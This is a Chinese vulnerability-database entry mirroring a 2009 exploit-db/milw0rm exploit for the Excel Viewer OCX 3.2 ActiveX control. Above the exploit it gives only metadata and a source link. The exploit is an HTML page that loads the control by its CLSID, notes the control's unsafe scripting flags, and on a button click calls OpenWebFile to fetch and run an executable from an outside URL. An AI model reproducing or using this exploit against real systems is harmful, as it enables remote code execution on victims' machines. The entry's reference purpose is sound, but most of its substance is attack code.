Excel Viewer OCX 3.2 - Remote Command Execution

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057309 漏洞类型
发布时间 2009-01-14 更新时间 2009-01-14
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7763
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<HTML>
---------------------------------------------------------- <br>
 Excel Viewer OCX 3.2 Remote File execution exploit        <br>
---------------------------------------------------------- <br>
-----------------------------------<br>
#  By Mountassif Moad a.k.a Stack #
-----------------------------------<br>
<!--
v4 Team & evil finger
Class EXCEL
GUID: {18A295DA-088E-42D1-BE31-5028D7F9B965}
Number of Interfaces: 1
Default Interface: _DEXCEL
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Report for Clsid: {18A295DA-088E-42D1-BE31-5028D7F9B965}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data 
IPersist Safe:  Safe for untrusted: caller,data 
IPStorage Safe:  Safe for untrusted: caller,data   -->
<title>Excel Viewer OCX 3.2 Remote File execution exploit</title>
<BODY>
 <object id=Stack classid="clsid:{18A295DA-088E-42D1-BE31-5028D7F9B965}"></object>
<SCRIPT>
function Do_it()
 {
   File = "http://monmaroc.com/calc.exe"
   Stack.OpenWebFile(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="exploit">
</body>
</HTML>

# milw0rm.com [2009-01-14]